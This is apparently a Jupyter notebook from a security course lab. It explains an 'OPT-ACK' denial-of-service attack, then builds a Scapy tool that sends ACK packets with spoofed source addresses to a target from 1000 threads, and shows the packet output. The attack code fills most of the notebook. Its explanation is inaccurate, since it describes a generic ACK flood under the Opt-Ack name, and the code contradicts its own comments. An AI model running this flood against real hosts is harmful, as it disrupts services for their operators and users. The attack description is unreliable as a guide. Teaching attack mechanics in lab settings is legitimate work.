# Introduction to OPT-ACK attack

## What is the OPT-ACK Attack?

The OPT-ACK attack is a denial-of-service (DoS) attack that exploits a vulnerability in the TCP (Transmission Control Protocol) implementation. It leverages the ACK (Acknowledgement) flag in TCP packets to overwhelm a target system.

In normal TCP communication, a three-way handshake establishes a connection:

1.  **SYN (Synchronize):** The client sends a SYN packet to the server, initiating the connection.
2.  **SYN-ACK (Synchronize-Acknowledge):** The server responds with a SYN-ACK packet, acknowledging the client's request and synchronizing its own sequence numbers.
3.  **ACK (Acknowledge):** The client sends an ACK packet to the server, confirming the connection establishment.

The OPT-ACK attack bypasses this handshake. The attacker sends numerous TCP packets with the ACK flag set, but without any prior SYN or SYN-ACK exchange. These "out-of-context" ACK packets, often with random or invalid sequence and acknowledgment numbers, are unexpected by the target. The target's TCP stack then wastes resources trying to process and respond to these spurious ACKs. This processing overhead can lead to performance degradation, resource exhaustion, and ultimately, denial of service.

Key characteristics of the OPT-ACK attack:

*   **Out-of-context ACKs:** The attack relies on sending ACK packets without a preceding connection establishment.
*   **Resource exhaustion:** The target's resources (CPU, memory) are consumed by processing the invalid ACK packets.
*   **Bypasses SYN flood defenses:** Traditional SYN flood defenses are often ineffective against OPT-ACK attacks because they focus on the connection establishment phase, while OPT-ACK attacks occur outside of it.

## Lab Objective

In this lab, we are going to implement a tool to perform OPT-ACK DoS attacks. This will help you understand the mechanics of the attack and the potential security implications. You will learn how to:

- Craft and send TCP packets using a packet crafting library (e.g., Scapy in Python).
- Understand how new and complex DoS attacks work by implementing one.
- Observe the impact of out-of-context TCP packets on a target system.

In [42]:
from scapy.all import *
from scapy.layers.inet import TCP, IP
import random
import time
import threading
import signal
import sys

# Define target IP and port
target_ip = "192.0.0.2"
target_port = 80

def generate_random_ip():
    return f"192.0.0.{random.randint(1, 254)}"

def generate_random_port():
    return random.randint(1025, 65535)

# Flag to control the attack loop
attack_running = True

Now it's your turn...

In [40]:
"""
Sends optimized ACK packets to a target IP and port from a source IP and port in a loop.

This function creates IP and TCP layers with high-end sequence and acknowledgment numbers,
and sends the packets continuously until the global variable `attack_running` is set to False.

Args:
    target_ip (str): The target IP address to send packets to.
    target_port (int): The target port to send packets to.
    source_ip (str): The source IP address to send packets from.
    source_port (int): The source port to send packets from.
Raises:
    Exception: If there is an error sending a packet, it will be printed to the console.
"""
def send_opt_ack_attack(target_ip, target_port):
    # Your code here

    #creating an ip layer
    ip_layer = IP(
        src = generate_random_ip(),   #Set the Source IP Address
        dst = target_ip   # Set the Target IP address
    )

    #creating an TCP Layer 
    tcp_layer = TCP(
        sport = generate_random_port(),
        dport = target_port,
        flags = "A", #set flag to ACK to cause out of order ACK packet attack 
        # Random 32-bit sequence and acknowledgment numbers
        seq =  random.randint(0, 2**32 - 1),
        ack =  random.randint(0, 2**32 - 1)
    )
    packet = ip_layer / tcp_layer 
    
    #display the packet 
    print(packet.show())
    # Remember to use the global variable attack_running to control the loop and to create the IP and TCP layers
    # if the global variable is true, send packets 
    if attack_running:
        send(packet)     #send a packet
    
    pass

"""
Starts multiple threads to perform the optimized ACK attack.
This function creates and starts a specified number of threads, each running the
`send_opt_ack_attack` function to send packets to the target IP and port.
Arg
    threads_count (int): The number of threads to start for the attack.
Raises:
    Exception: If there is an error starting a thread, it will be printed to the console.
"""
def start_attack(threads_count):
    threads = []
    for i in range(threads_count):
        t = threading.Thread(target=send_opt_ack_attack, args=(target_ip, target_port))
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

In [44]:
# Signal handler for graceful shutdown
def signal_handler(sig, frame):
    global attack_running
    print("Stopping attack...")
    attack_running = False
    sys.exit(0)

# Register signal handler
signal.signal(signal.SIGINT, signal_handler)

# Start the attack with 10 threads
print("Starting attack with 1000 threads...")
start_attack(1000)

Starting attack with 1000 threads...
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = tcp
  chksum    = None
  src       = 192.0.0.3
  dst       = 192.0.0.2
  \options   \
###[ TCP ]###
     sport     = 15527
     dport     = http
     seq       = 2897396211
     ack       = 1753773077
     dataofs   = None
     reserved  = 0
     flags     = A
     window    = 8192
     chksum    = None
     urgptr    = 0
     options   = []

None
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = tcp
  chksum    = None
  src       = 192.0.0.174
  dst       = 192.0.0.2
  \options   \
###[ TCP ]###
     sport     = webmachine
     dport     = http
     seq       = 1361165889
     ack       = 285258938
     dataofs   = None
     reserved  = 0
     flags     = A
     window    = 819